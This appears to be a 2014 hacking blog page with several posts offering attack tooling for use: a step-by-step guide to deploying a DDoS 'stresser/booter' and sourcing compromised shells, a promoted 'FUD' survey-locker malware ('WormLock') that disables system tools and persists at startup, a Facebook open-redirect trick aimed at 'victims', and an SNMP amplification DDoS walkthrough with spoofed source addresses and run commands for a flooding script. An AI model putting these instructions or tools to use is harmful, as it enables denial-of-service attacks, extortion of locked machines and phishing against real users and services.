Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Monday, 31 March 2014

How to "Start" or "Make" Your Own "Stresser/Booter"

How to "Start" or "Make" Your Own "Stresser/Booter"

Download :
JeeJee Power v1.0 Source and Shell Checker Click here to download this file

What is a Stresser:

So. You may be this far, but you may not know what a stresser, or "booter" even is. A stresser uses shells or api's to attack a certain location. These will send a certain amount of packets to the desired location, and if it sends enough packets it will force the server, or connection to flood, and simply crash. When a router, or connection/network crashes, that server cannot handle the amount of incoming packets.

Introduction (Sector 1):

Welcome to Sector One of this tutorial. In this stage I will be teaching you the following:

  • How to setup your hosting.
  • How to upload and configure your stresser.

Uploading Your Files (Sector 1):

1. For tutorial purposes I'm simply going to use a hosting website called I would not advise using this website, you will not be able to send attacks. They have fsock disabled. As I said, this site is just for tutorial purposes. I would advise getting cheap hosting here at HackForums in the hosting marketplace.

Once you have your hosting, you will want to upload your files that you originally downloaded above. ONLY upload the files within the source folder included in the download. There is no point uploading the banner .PSD etc.

To upload your files download filezilla at or use the file manager in your hosting's cPanel.

Uploading and Configuring MySQL Databases (Sector 1):

Once you have your files uploaded. Go into your cPanel and create a MySQL database.

The majority of hosts, if not all will all come with MySQL installed.

Create your database. Remember the information used.

After your database has been created, we now want to edit three files. The three files are below:

Mandatory File Edits (Sector 1):

We need to edit the files so our stresser can connect to the MySQL Database.
  • dbc.php
  • shellcounter.php
  • includes/ezSQL.php ( line 44, 71 and 101 )


This is self explanatory. At the top you will see the lines below. The lines below explain exactly what to edit. Edit the information within the ' 's. Like I have done below.

PHP Code:
define ("DB_HOST""");
// set database hostdefine ("DB_USER""a9162705_xx"); 
// set database userdefine ("DB_PASS","Example1");  
// set database passworddefine ("DB_NAME","a9162705_xx");
// set database name 

Line 1: This is your database host.
Line 2: This is your database username.
Line 3: This is your database password.
Line 4: This is your database name.

If you haven't caught on by now. You need to input all of your MySQL information into those fields.


The top of shellcounter.php will look like this:

PHP Code:
/* START OF CONFIGURATION SECTION */$mysql_username 'a9162705_xx';     
// MySQL User Name$mysql_password 'Example1';   
// MySQL Password$mysql_hostname '';     
// MySQL Host Name$mysql_hostport 3306;
// MySQL Host Port$mysql_database 'a9162705_xx';    
// MySQL Database$mysql_shelltbl 'shellpool';    
// MySQL Table Name (will be created if it does not exist)
 $mysql_stengine 'MyISAM';    
// Preferred MySQL Storage Engine (MyISAM, MRG_MyISAM or InnoDB) 

You will only need to edit the following with your MySQL Database Information:

PHP Code:
$mysql_username 'a9162705_xx';
// MySQL User Namemysql_password 'Example1';   
// MySQL Password$mysql_hostname '';     
// MySQL Host Name$mysql_database 'a9162705_xx';
// MySQL Database 

LEAVE everything else as is. Ports for example, leave them. They're fine.


I would recommend getting Notepad++. Download it at, to navigate line numbers easier. Read above for the lines that need to be edited.

Line 44:

Edit the obvious fields. I've inputted my database information.

PHP Code:
function ezSQL_mysql($dbuser='a9162705_xx'$dbpassword='Example1'

Line 71:

Once again, edit the obvious fields. Look at the $values. It explains it clearly. $dbuser is the database username, and so on. Common sense.

PHP Code:
        function connect($dbuser='a9162705_xx'

Line 101:

Finally for a short one, line 101, just the database name.

PHP Code:
        function select($dbname='a9162705_xx'

Configuring PhpMyAdmin (Sector 2):

Welcome to Sector 2 of this tutorial. This will teach you how to configure your PhpMyAdmin with your stresser source. Please don't over think this. It may seem overwhelming, but it's incredibly simple.

Your cPanel should have PhpMyAdmin.

Locate the import button located at the top of PhpMyAdmin:

How to "Start" or "Make" Your Own "Stresser/Booter"

Once you're in the import menu. Upload the provided .SQL file in the JeeJee Power folder. Like below:

How to "Start" or "Make" Your Own "Stresser/Booter"

Then after click "Go" like provided below.

How to "Start" or "Make" Your Own "Stresser/Booter"
Then you should get a success message, and the databases should appear on the side.

Accounts (Sector 3):

Welcome to Sector 3 of this tutorial! In this sector we will be learning how to register our account, activate it, and then proceed to give our self administrator rights, and access to the AdminCP.

You will want to locate (Of course replace YOURDOMAIN with your actual domain, as this is just an example).

Creating An Account (Sector 3):

You will now be at the login page like below. (IF you get a MySQL error, you have input your MySQL details to the edited pages incorrectly).

How to "Start" or "Make" Your Own "Stresser/Booter"

Click the register button, and register your account.

How to "Start" or "Make" Your Own "Stresser/Booter"

Now your account is registered! Congratulations.

We're not done yet!

How to "Start" or "Make" Your Own "Stresser/Booter"

Activating Your Account and Making Yourself an Administrator (Sector 3):

Now go back to PhpMyAdmin.

Click the table called 'Users' on the side and then click Browse button at the top, just like when you clicked import.

How to "Start" or "Make" Your Own "Stresser/Booter"
You should see your own profile:

How to "Start" or "Make" Your Own "Stresser/Booter"

You want to click edit, which is of course the little pencil button.

You need to change the values. Change the user_level value to 5. This will make an you administrator. Then you want to change the approved value from 0 to 1 to approve your account.

Congratulations, your account is now active, and you're an administrator!

How to "Start" or "Make" Your Own "Stresser/Booter"

Accessing the Administrator Control Panel (Sector 3):

To go to the administrator's control panel go to (Obviously replace with your own once again).

From here you can change your booters name, add shells, post new bulletins, read logs, create users, active users and more!

Shells/APi's (Sector 4):

Ok. So you're finished, you want to get going right? Right. Unfortunately, this is the hard part. Well, easy but then again frustrating and can be time consuming.

You need shells or APi's for your booter/stresser to work. Here are your options:
  • Buy shells from people in the HF marketplace.
  • Get your own from pastebin and use a shell checker provided in the downloads.
  • Request free shells, or look for giveaways on HF.

Monday, 17 March 2014

[FUD] [Survey Builder] WormLock v1.0 [MAKE CASH] [FREE]

WormLock v1.0

What is WormLock?
WormLock is a Survey Locker. It locks slave's PC and asks to complete a survey in order unlock the PC.
With the right use you can easily make some mad cash.
It has better results by Downloading and Executing on slaves machines, rather than spreading it.

✔Disables Task Manager
✔Disables Explorer
✔Disables cmd
✔Disables msconfg
✔Startup Installation
✔After entering unlock key, automatically removes itself

It has .NET dependecy.
The builder needs .NET 4 and the output file, it only requires .NET 2
So yeah make sure your slaves have .NET installed. (90% of Windows machines have .NET installed these days.)
Tested on Windows XP, Vista and 7.

It is still v1.0 so maybe there are bugs.
Please feel free to report them.
It will be a free survey locker and i am planning on adding more features in the future.

Do not scan the builder or the outputed file on virustotal, or into any service that distributes samples.
You will make it detected fast.

(There is only 1 exe on ZIP):
Outputed file:



24 Hours Direct Online Tutorial by Admin ( Prince ) on 22 March 2014

The admin is here for u ! 24 hours online tutorial ! The admin that is me , Prince , will be online via facebook , twitter , gmail and link given below for 24 hours. U can contact him personally via those links to get instant reply for those tutorial stated .

Date : 22/3/2014
Time : 00.00 - 00.00 (the next day)

The tutorial consists :
- All OS tips and tweaks (windows/Mac/Linux)
- C++ Programming language
- Beginner Hacking tips
- Software/Games Free download request
Not Included ANY Social Networks Hacking .

U can contact the Admin via :

Facebook Group :
Follow me on twitter :
Gmail Address :
Chatango :

Please DON'T make fun out of this . I m doing this for those who need help . Thanks .
This Post will be deleted on the next day . Thanks .

Saturday, 8 March 2014

Facebook Open Redirect Variability

Facebook Open Redirect Variability

This very short tutorial will explain my way of creating Facebook open redirect links. s some of you may know, Facebook open redirects are rare and hard to make due to the LinkShin (l.php)
This method however, is easy and Facebook the selves don't think this is a vulnerability: "This is not a vulnerability in our opinion." Note the "in our opinion" - to me this is a vulnerability.
This open redirect will work as long as your are friends with the person you are sending the link to.

Step 1 :-

First Visit to this link over to

The page will look like :-

Facebook Open Redirect Variability

Step 2 :-

Then view the page source and search for h=

Facebook Open Redirect Variability
Step 3 :-

copy the security code after the h= and before the &s=. It will look like this h=XXXXXXXXX You have to copy only XXXXXXXXX

Step 4 :-

Now simply create the URL like

Step 5 :-

Give this link to your victim he or she will get the redirect to be open (without "leaving facebook" warning)

As said earlier you can only get the redirect to be open (without "leaving facebook" warning) if you're sending this link to a friend.
It is possible to create the link before adding the victim as a friend. But there does have to be that "relationship" between accounts.

Thursday, 6 March 2014

Get FREE SUBDOMAIN from Ten Thousands (10000) of domains (IP to Domain)

Get FREE SUBDOMAIN from Ten Thousands (10000) of domains (IP to Domain)

Step 1:

Register a new account at this web-site: Create your account
You should use a valid email, since the Registration required Email Confirmation..

Step 2:

When you're in, go to this page: Domain Registry : Page 1 of 1004
This is where you choose the domain name you want to attach your subdomain. You should click on the "Status" at the top (header) of the table to sort results, so you first see all the "Public" domains. You can use the "Search" function to look-up a specific domain. For example lets use "". Just click on the domain you have chosen.

Step #3:

Type: This indicates the type of your target (address of the server you want to add the subdomain). For Example, use "A" if you are using an IP, or use CNAME, if you are using another domain name.
Subdomain: This will be your subdomain (Just the front part of the address here, not full address). For example, type "hacking" or "trick".
Domain: We do not change this one, since it indicated the domain name we have just chosen.
Destination: This is your IP or current domain of your server, which you want to get a nice & cute subdomain. For example ""
TTL: Don't touch this one.
Wildcard: Don't touch this one either.

Now you can press the "Save!" button. If you are using an IP Address, subdomain will be activated already now, but if you use another domain, there will be one additional form, which is explained in the "Step 4".

Step 4:

If you have chosen another domain name for the new subdomain, you will need to fill additional form, which is described bellow:

Redirect From: Do not change this, since its the same domain you are now setting up.
Redirect To: This is the same domain you want to add the subdomain. For Example: (It will not work, if you do not specify "http://" in the front.

If you want a simple re-direct to your domain, you are done, and you can click "save", but if you want to really Mask it (not a redirect), you need to fill few more fields in this form:

Cloak?: Check the Check-Box.
Force Dir Root?: Check the Check-Box, if you want it to be at your root directory of your web-site.
Page Title (if cloaked): Simple, the Title of Your Page. If you are cloaking, "Page's Title" & "Page's Favicon" stated on your web-site will not show, so you can set them here. For Example: "WingTsun's SubDomain Tutorial".
favicon.ico (if cloaked): Link to the favicon.ico file (this is the Icon of your web-site). You can use your own server it, lets use for example:

Hit the "save" button, and you are done my friend! You have created your new subdomain (

Tuesday, 4 March 2014

How To Do SNMP Multiplication Attack?

How To Do SNMP Multiplication Attack?

How does it work?

snmp has a feature called getbulk which lists all snmp variables. Asking for the getbulk takes about 85 bytes, the getbulk result is about 2484 bytes and since SNMP is UDP an attacker can spoof the IP origin and those 2484 bytes will go to a target. As a result an attacker has an 18x amplification attack so for every 1 byte an attacker sends 29 bytes sent to the target.

The scary part? Shodan is currently detecting around 626,752 SNMP servers in the DMZ.

How do I do it?

Manipulate the UDP header yourself or use the python script:
Requires root and scapy library (sudo apt-get install python-scapy)

Run the script like this: <target ip> <SNMP server list> <number of threads>

EX: "" "list.txt" "10"

(Attempts to snmp flood using a list of servers at list.txt by creating 10 threads

Install it by:

git clone
cd snmpdos
chmod +x
./ -h
You need to have your server list formatted as:
(One server per line)

You will also need some snmp servers that allow bulkget operations

How do I find servers that support bulkget operations?

Thats up to you but you could try just trial and error via shodan

Will this run on windows?

Since XP SP2 windows has disallowed invalid UDP headers. Just boot up a Backtrack/Kali VM if you want it to work 100%

Related Posts Plugin for WordPress, Blogger...